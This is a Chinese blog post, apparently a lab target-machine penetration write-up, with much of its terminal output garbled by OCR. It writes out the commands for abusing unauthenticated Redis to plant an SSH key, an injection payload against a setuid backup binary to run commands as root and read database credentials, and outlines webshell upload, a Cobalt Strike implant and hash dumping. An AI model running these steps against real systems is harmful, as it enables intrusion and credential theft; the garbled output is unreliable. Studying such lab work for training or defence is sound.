开启掘金成长之旅!这是我参与「掘金日新计划 · 12 月更文挑战」的第20天,点击查看活动详情
0806靶机
redis 未授权
wordpress 6.0.1 版本太新还没有爆出漏洞
X
MY BLOG - JUST ANOTHER WORDP X
不安全172.16.200.130
SAMPLE PAGE
MY BLOG
8:17:55
中国英
2022/8/5
nmap扫描:
DONE: 1 IP ADDRESS (1 HOST
SCANNED IN 2.38
SECONDS
NMAP
:\悬剑武器库\TOOLS\目录扫描\DIRSEARCH>NMAP -P 1-1000-SS 172.172.16.200.130
) AT 2022-08-04 16:45 ?D1U士EX?
STARTING NMAP 7.92 ( HTTPS://NMAP. ORG
\悬剑武器库\TOOLS\目录扫描\D
DIRSEARCH>
C:\悬剑武器库\TOOLS\目录扫描\
LIRSEARCH>NMAP -P 1-1000 -SS -V 172.16.200.130
STARTING NMAP 7.92 ( NMAP.ORG )
AT 2022-08-04 16:46 ?D1U士EX?E士??
INITIATING PING SCAN AT 16:46
SCANNING 172.16.200.130 [4 PORTS]
TOTAL HOSTS)
(1
COMPLETED PING SCAN AT 16:46, 0.09S ELAPSED
T 16:46
INITIATING PARALLEL DNS RESOLUTION OF 1 HOST. AT 161
AT 16:46, 2.01S ELAPSED
COMPLETED PARALLEL DNS RESTES
DNS RESOLUTION OF 1 HOST. AT 16
INITIATING SYN STEALTH SCAN A
1 AT 16:46
172.16.200.130
100000
PORTS
CANNING
80/TCP ON
172.16.200.130
JISCOVERED OPEN
PORT
OPEN PORT 22/TCP
172.16.200.130
DISCOVERED
ON
OPEN PORT 6739/TCP
172.16.200.130
DISCOVERED
ON
开放6739端口猜测是redis
redis 未授权,连接后写入ssh公钥
$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
cat foo.txt | redis-cli -h 172.16.200.130 -p 6739 -x set crackit
config set dir /home/ubt/.ssh/ config set dbfilename "authorized_keys" save
info server:
ssh远程链接
UBTQSRV-WEB://OPT$ CONNECTION RESET BY 172.16.200.130 PORT 22
PS C:\USERS)XUANJIAN\DESKTOP\20220804 肥场\SSH> SSH -I .\ID-I .\ID-E172.16.200.130
OR DIRECTORY.
WARNING: IDENTITY FILE ./ID-RSA NOT ACCESSIBLE: NO SUCH FILE OR DI
WELCOME TO UBUNTU 20.04.4 LTS (GNU/LINUX 5.15.0-41-GENERIC X86-64)
DOCUMENTATION:
MANAGEMENT:
SUPPORT:
IMMEDIATELY.
UPDATES CAN BE APPLIED IMME
FAILED TO CONNECT TO HTEPS//EHANDELOAS,UBUNTU-CON/UETA-TELE3SE-LTS, CHECH JOUR INTERNEETTION OR PROX
YOUR HARDWARE ENABLEMENT STACK (HWE) IS SUPPORTED UNTIL APRIL 2025.
LAST LOGIN: THU AUG 4 10:01:28 2022 FROM 172.16.200.128
UBT@SRV-WEB:~$
查看.bash_history
查看系统信息
查看定时任务
定时任务执行了bk命令
WHICH
UBT@SRV-WEB:
BK
/USR/LOCAL/BIN/BK
UBT@SRV-WEB:~$ /USR/LOCAL/BIN/BK
THIS IS WEBSITE BACKUP PROGRAM
USAGE:
/USR/LOCAL/BIN/BK WEBSITE_PATH BACKUPFILE
发现bk命令是网站备份程序,且是setuid程序,如果存在命令注入漏洞就可以成功拿到root权限。
LS-AL /USR/LOCAL/BIN/BK
UBT@SRV-WEB:~
-RWSR-SR-X 1 ROOT ROOT 14472 JUL 27 00:17
/USR/LOCAL/BIN/BK
注意到属主的权限是rws,s表示任何一个用户都可以有可修改的权限,在这里每个用户可以自己修改自己的密码。
strings bk
tar zcvf %s.tar.gz %s 可以看到会用tar命令打包输入的文件字符串,这里可以构造一下
UBT@SIV-WEB://USR/LOCAL/BIN$ TAR ZCVF S.TAR.GZ WEBSITE-PATH / ID
TAR: WEBSITE-PATH: CANNOT STAT: NO SUCH FILE OR DIRECTORY
TAR (CHILD):S.TAR.GZ: CANNOT OPEN: PERMISSION DENIED
TAR (CHILD): ERROR IS NOT RECOVERABLE: EXITING NOW
TAR:CHILD RETURNED STATUS 2
TAR:ERROR IS NOT RECOVERABLE:EXITING NOW
UBT@SRV-WEB://USR/LOCAL/BIN$ BK "1/ID"
THIS IS WEBSITE BACKUP PROGRAM
USAGE:
BK WEBSITE_PATH BACKUPFILE
UBT@SRV-WEB://USR/LOCAL/BIN$ BK "1LID" 1
[*] WEB PATH:1|ID
[*] BACKUP FILE:1.TAR.GZ
L: CANNOT STAT:NO SUCH FILE OR DIRECTORY
TAR: EXITING WITH FAILURE STATUS DUE TO PREVIOUS ERRORS
bk "1|id" 1 在运行tar命令时候会变成 tar 1.tar.gz 1|id,因此可以利用bk命令进行root权限的命令执行
bk "1|cat /var/www/html/wp-config.php" 1 查看网站配置文件中的mysql账号密码
可以看到此网站站库分离,数据库在172.16.10.210,挂代理连上mysql后,发现是高版本的mysql,
不过发现这台数据库服务器开了一个web应用,虽然页面部分是404,但是网站通过图标发现是xampp搭建,用xampp默认的web路径写入shell
蚁剑连上后传cs木马。hashdump 找到密码hash
使用内网BloodHound来进行域信息的收集
